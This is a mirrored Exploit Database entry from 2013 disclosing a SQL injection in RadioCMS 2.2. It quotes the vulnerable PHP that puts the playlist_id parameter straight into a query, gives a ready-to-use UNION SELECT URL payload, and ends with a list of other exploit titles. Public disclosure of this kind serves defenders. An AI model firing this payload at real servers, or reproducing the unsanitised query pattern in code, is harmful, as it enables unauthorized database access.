RadioCMS 2.2 – ‘menager.php?playlist_id’ SQL Injection

Exploit Database
14 阅读

作者： Rooster(XEKA)

日期： 2013-05-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/25726/

#################################################
+
+ Title: RadioCMS 2.2
+ Author: Rooster(XEKA)
+ Greetz to: Isis,luz3r,slider
+ Contact: forum.xeksec.com
+
#################################################

--[ Vuln Code ] --

...
if ($_GET['playlist_id']) {
$playlist_id_get = ['playlist_id'];
}
...
if ($playlist_id != "") {
$query = "SELECT * FROM `playlist` WHERE $playlist_id;";
...
 

################################################

--[ Exploitable ]--

http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12

################################################

last Exploits
RadioCMS 2.2 – ‘menager.php?playlist_id’ SQL Injection的更多信息

Online Test Script 2.0.7 – ‘cid’ SQL Injection：
Erolife AjxGaleri VT – Database Disclosure：
Social Community Script – SQL Injection：
Auto Web Toolbox – ‘id’ SQL Injection：
OpenEMR 4.1.1 Patch 14 – Multiple Vulnerabilities：
webEdition CMS – ‘we_fs.php’ SQL Injection：
Horde – Horde_Image::factory driver Argument Local File Inclusion：
CSE Bookstore 1.0 – Multiple SQL Injection：